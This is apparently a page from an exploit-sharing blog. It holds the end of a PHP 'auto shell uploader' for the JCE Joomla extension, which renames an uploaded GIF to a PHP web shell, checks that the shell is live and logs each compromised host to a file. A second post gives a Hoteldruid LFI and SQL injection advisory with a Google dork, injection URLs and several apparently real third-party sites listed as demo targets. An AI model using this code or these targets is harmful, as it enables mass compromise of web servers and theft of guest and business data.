            $packet  = "POST ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";
            $packet .= "Host: ".$host."\r\n";
            $packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n";
            $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
            $packet .= "Accept-Language: en-US,en;q=0.8\r\n";
            $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
            $packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";
            $packet .= "Accept-Encoding: deflate\n";
            $packet .= "X-Request: JSON\r\n";
            $packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";
            $ren ="json={\"fn\":\"folderRename\",\"args\":[\"/m3rs1n.gif\",\"m3rs1n.php\"]}";
            $packet .= "Content-Length: ".strlen($ren)."\r\n\r\n";
            $packet .= $ren."\r\n\r\n";
            
            sendpacket($packet,1,0,0);

                                          /* Packet 4 --> Check for successfully uploaded */
                                        
                                        
            $packet  = "Head ".$p."/images/stories/m3rs1n.php HTTP/1.1\r\n";
            $packet .= "Host: ".$host."\r\n";
            $packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";
            
            sendpacket($packet,1,0,0);
  
  if(stristr($html , '200 OK') != true)
  {
      echo '.';  
 } else {
      ;   $ac = fopen("shellerr.txt","a+");   fwrite($ac,$host.":".$port.$part."/images/stories/m3rs1n.php\n");
  echo "\nhttp://$host:$port$path"."/images/stories/m3rs1n.php\n";}flush();
}

} ?> 

s

+] Author: TUNISIAN CYBER

[+] Exploit Title:  Hoteldruid (PHP-residence) v1.X.X (SQLi/LFI) Multiple Vulenrabilities

[+] Date: 14-12-2013

[+] Category: WebApp

[+] Vendor: http://www.hoteldruid.com/en/download.html

[+] Google Dork: inurl:"mostra_sorgente.php"

[+] Tested on: Win7 , ubuntu 13.04

########################################################################################

Description:

Hoteldruid is an open source program for hotel management (property management software) suffers from Local File Inclusion and SQL injection

I/LFI:

http://127.0.0.1/php-residence/mostra_sorgente.php?file_sorgente=[FILE]

II/SQLi:

http://127.0.0.1/php-residence/creaprezzi.php?anno=[YEAR]'

http://127.0.0.1/php-residence/messaggi.php?id_sessione=&anno=[YEAR]'

Fix:

Upgrade to v2.0.3

Demo:

http://www.hoteldruid.com/demo/mostra_sorgente.php?file_sorgente=clienti.php

https://lodginginspirational.com/mostra_sorgente.php?file_sorgente=clienti.php

http://www.at184.com/availability/mostra_sorgente.php?file_sorgente=/

http://www.pantelleriaest.com/hoteldruid/mostra_sorgente.php?file_sorgente=crea_backup.php

http://tbg.evolve2.org/mostra_sorgente.php?file_sorgente=themes/snj/php/menu.php

Priv8 | Local Root Exploit # HeRoTurk

18 Aralık 2013 Çarşamba

Local Root Exploit 2.6.18 2011

Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1

14 Aralık 2013 Cumartesi

Hoteldruid (PHP-residence) v1.X.X (SQLi/LFI) Multiple Vulenrabilities

Local Root Exploit 2.6.18 2011

Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1

Hoteldruid (PHP-residence) v1.X.X (SQLi/LFI) Multiple Vulenrabilities

Popüler

Popular Posts